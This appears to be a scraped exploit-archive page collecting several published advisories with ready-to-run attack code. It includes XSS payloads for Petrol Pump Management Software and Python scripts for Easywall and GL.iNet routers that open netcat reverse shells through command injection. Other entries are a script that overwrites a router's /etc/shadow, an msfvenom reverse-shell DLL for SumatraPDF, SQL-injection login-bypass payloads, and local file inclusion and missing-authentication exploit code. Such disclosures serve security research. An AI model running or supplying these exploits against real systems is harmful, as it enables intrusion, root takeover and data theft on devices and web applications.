Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

This is an interesting whitepaper called Compromising Industrial Processes using Web-Based Programmable Logic Controller Malware. The authors present a novel approach to developing programmable logic controller (PLC) malware that proves to be more flexible, resilient, and impactful than current strategies.

Compromising Industrial Processes Using Web-Based Programmable Logic Controller Malware

Easywall version 0.3.1 suffers from an authenticated remote command execution vulnerability.

    # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution# Date: 30-11-2023# Exploit Author: Melvin Mejia# Vendor Homepage: https://jpylypiw.github.io/easywall/# Software Link: https://github.com/jpylypiw/easywall# Version: 0.3.1# Tested on: Ubuntu 22.04import requests, json, urllib3urllib3.disable_warnings()def exploit():        # Replace values needed here    target_host = "192.168.1.25"    target_port= "12227"    lhost = "192.168.1.10"    lport = "9001"    user = "admin"    password = "admin"        target = f"https://{target_host}:{target_port}"    # Authenticate to the app    print("[+] Attempting login with the provided credentials...")    login_data = {"username":user, "password":password}    session = requests.session()    try:        login = session.post(f'{target}/login',data=login_data,verify=False)    except Exception as ex:        print("[!] There was a problem connecting to the app, error:", ex)        exit(1)    if login.status_code != 200:        print("[!] Login failed.")        exit(1)    else:        print("[+] Login successfull.")            # Send the payload, the port parameter suffers from a command injection vulnerability    print("[+] Attempting to send payload.")    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)    if send_payload.status_code != 200:        print("[!] Failed to send payload.")        exit(1)    else:        print("[+] Payload sent.")    # Trigger the execution of the payload    print("[+] Attempting execution.")    data = {"step_1":"", "step_2":""}    execute = session.post(f"{target}/apply-save",data=data, verify=False)    if execute.status_code != 200:        print("[!] Attempt to execute failed.")        exit(1)    else:        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")exploit()

Easywall 0.3.1 Remote Command Execution

GL.iNet AR300M versions 3.216 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar# Version: 3.216# Tested on: GL.iNet AR300M# CVE: CVE-2023-46456import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def generate_random_string():  return ''.join([chr(randint(97, 122)) for x in range(6)])def add_config_file(url, auth_token, payload):  data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}  try:    r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding configuration file')    return False  return Truedef verify_config_file(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    if not r.json()['passed'] and payload not in r.json()['passed']:      return False  except requests.exceptions.RequestException:    print('[X] Error while verifying the upload of configuration file')    return False  return Truedef add_client(url, auth_token):  postdata = {'description':'RCE_client_{}'.format(generate_random_string())}  try:    r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding OpenVPN client')    return False  return Truedef get_client_id(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    for conn in r.json()['clients']:      if conn['defaultserver'] == payload:        return conn['id']    print('[X] Error: could not find client ID')    return False  except requests.exceptions.RequestException:    print('[X] Error while retrieving added OpenVPN client ID')  return Falsedef connect_vpn(url, auth_token, client_id):  sleep(0.25)  postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}  r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)def cleanup(url, auth_token, client_id):  try:    r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while cleaning up OpenVPN client')    return False  return Truedef get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')  payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)  print('[+] Filename payload: "{}"'.format(payload))  print('[*] Uploading crafted OpenVPN config file')  if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):    exit(1)  if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):    exit(1)  print('[+] File uploaded successfully')  print('[*] Adding OpenVPN client')  if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):    exit(1)  client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)  if not client_id:    exit(1)  print('[+] Client ID: ' + client_id)  print('[*] Triggering connection to created OpenVPN client')  Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[*] Clean-up by removing OpenVPN connection')  if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):    exit(1)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 3.216 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46454import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def trigger_revshell(url, auth_token, payload):  sleep(0.25)  data = {    'jsonrpc': '2.0',    'id': randint(1000, 9999),    'method': 'call',    'params': [      auth_token,      'plugins',      'get_package_info',      {'name': 'bas{}e-files'.format(payload)}    ]  }  requests.post(url, json=data, verify=False)def get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)  print('[+] Reverse shell payload: "{}"'.format(payload))  print('[*] Triggering reverse shell connection')  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 4.3.7 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46455import cryptimport requestsfrom sys import argvrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def craft_shadow_file(salted_password):  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  shadow_content += 'daemon:*:0:0:99999:7:::\n'  shadow_content += 'ftp:*:0:0:99999:7:::\n'  shadow_content += 'network:*:0:0:99999:7:::\n'  shadow_content += 'nobody:*:0:0:99999:7:::\n'  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  shadow_content += 'stubby:x:0:0:99999:7:::\n'  shadow_content += 'ntp:x:0:0:99999:7::\n'  shadow_content += 'mosquitto:x:0:0:99999:7::\n'  shadow_content += 'logd:x:0:0:99999:7::\n'  shadow_content += 'ubus:x:0:0:99999:7::\n'  return shadow_contentdef replace_shadow_file(url, auth_token, shadow_content):  data = {    'sid': (None, auth_token),    'size': (None, '4'),    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),    'file': ('shadow', shadow_content)  }  requests.post(url, files=data, verify=False)def main(base_url, auth_token):  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  password = input('[?] New password for root user: ')  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  shadow_content = craft_shadow_file(salted_password)  print('[+] Crafted shadow file:\n{}'.format(shadow_content))  print('[*] Replacing shadow file with the crafted one')  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 3:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))    exit(1)  main(argv[1], argv[2])

GL.iNet AR300M 4.3.7 Arbitrary File Write

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

TPC-110W suffers from a missing authentication vulnerability.

    #include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <arpa/inet.h>#include <unistd.h>int main(int argc, char *argv[]) {    int sock;    struct sockaddr_in serv_addr;    char command[512];    sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock < 0) {        perror("socket");        exit(1);    }    memset(&serv_addr, '0', sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10        perror("inet_pton");        exit(1);    }    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {        perror("connect");        exit(1);    }    // Run command with root privileges    snprintf(command, sizeof(command), "id\n"); // Check user id    write(sock, command, strlen(command));    memset(command, '0', sizeof(command));    read(sock, command, sizeof(command));    printf("%s\n", command);    close(sock);    return 0;}//gcc -o tpc-110w-exploit tpc-110w-exp

TPC-110W Missing Authentication

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Tag

#auth